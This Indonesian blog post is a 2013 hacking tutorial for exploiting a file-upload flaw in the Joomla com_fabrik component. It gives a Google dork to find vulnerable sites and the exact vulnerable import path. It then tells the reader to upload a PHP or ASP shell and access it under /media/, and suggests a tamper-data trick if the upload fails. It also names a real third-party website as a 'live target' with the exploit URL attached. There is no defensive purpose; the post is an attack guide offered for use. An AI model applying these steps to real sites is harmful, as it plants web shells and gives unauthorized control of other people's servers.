Posted by : Ham JavaNet Sabtu, 23 Maret 2013

Bismillahirrahmanirrahim

Assalamualaikum sobat 207cs, apa kabarnya nih ? maaf ya jarang update, lagi asik liburan soalnya. kwkwkwk

     Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]

inurl:index.php?option=com_fabrik
 2. Ceritanya kita sudah mendapat si target
http://ar.librodar.com.ar/index.php?option=com_fabrik
3. Maka pastekan Vulnerable path nya di belakang Url, Vulnerable path nya adalah ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Maka akan jadi seperti ini
http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe
php,asp,html,jpg
6. Sudah ? nah sekarang kita akses shellnya di
http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan

Wabillahittaufiq Wassalamualaikum Warahmatullahiwabarokatuh

Description: Exploit Joomla COM_FABRIK | Upload Vulnerability
Rating: 4.5
Reviewer: Ham JavaNet
ItemReviewed: Exploit Joomla COM_FABRIK | Upload Vulnerability

Leave a Reply

Monggo Tinggalkan Jejak Kaks :)

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Labels

Arsip Blog

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -